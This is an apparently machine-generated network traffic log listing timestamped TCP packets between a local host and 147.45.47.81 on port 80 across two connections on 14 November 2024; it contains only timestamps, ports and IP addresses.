                                                                                                                                                                                                            Nov 14, 2024 12:19:58.300312996 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.300343037 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.316994905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317018986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317034960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317061901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317182064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317195892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.317223072 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.329926968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.329950094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.329967022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.329982042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.329997063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330003023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330013990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330020905 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330056906 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330351114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330368996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330384016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.330408096 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331768036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331784964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331813097 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331825972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331842899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331876040 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331887007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331933022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.331984043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332000017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332015991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332030058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332041979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332070112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332079887 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332086086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332101107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332117081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332125902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332142115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332156897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332165956 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332171917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332187891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332192898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332231998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332246065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332317114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332333088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332346916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332367897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332376003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332393885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332396984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332415104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332429886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332442045 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332444906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332459927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332469940 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332473993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332490921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332498074 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332505941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332528114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332717896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332732916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332767963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332768917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332783937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332799911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332813025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332820892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332828999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332839966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332843065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332858086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332871914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332874060 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332895994 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332977057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.332998037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333030939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333035946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333051920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333066940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333081961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333084106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333096981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333111048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333112001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333127975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333143950 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.333168030 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.369486094 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.371412992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.372144938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.372284889 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387682915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387764931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387779951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387794018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387868881 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.387868881 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389429092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389537096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389549971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389564037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389590025 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.389713049 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396537066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396621943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396636963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396652937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396667004 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396668911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.396941900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400048018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400100946 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400181055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400196075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400211096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400224924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400237083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400238991 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400255919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400271893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400285959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400300980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400312901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400351048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400382042 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400398970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400398970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400398970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400413990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400429010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400460005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400475025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400504112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400505066 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400585890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400599003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400613070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400655031 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400660038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400676966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400691032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400715113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400715113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400738955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400753975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400768042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400857925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400857925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400923014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400937080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400950909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400974989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.400990963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401005983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401020050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401020050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401042938 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401056051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401071072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401087999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401102066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401138067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401169062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401175976 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401175976 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401185036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401257038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401266098 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401273012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401350975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401366949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401413918 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401431084 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401587963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401603937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401618004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401633024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401649952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401663065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401674032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401674032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401704073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401716948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401731014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401743889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401783943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401783943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.401783943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419070959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419089079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419104099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419145107 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419215918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419230938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.419285059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440638065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440663099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440680981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440696955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440713882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440728903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440736055 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440736055 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.440776110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.448900938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.448919058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.448935032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.448951006 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.448970079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449052095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449068069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449084044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449098110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449229002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449544907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449558973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.449600935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450630903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450645924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450660944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450695992 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450764894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450779915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450798988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450804949 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450812101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450838089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450860977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450865984 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450874090 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450875044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450890064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450907946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450915098 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450948000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450948000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450967073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450983047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.450999022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451005936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451014996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451040983 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451081038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451096058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451112986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451121092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451155901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451160908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451174021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451188087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451203108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451209068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451244116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451303959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451328039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451344013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451359034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451371908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451378107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451400042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451450109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451467991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451483965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451498985 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451499939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451515913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451523066 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451560974 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451761007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451776028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451791048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451805115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451817989 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451819897 CET8049958147.45.47.81192.168.2.10
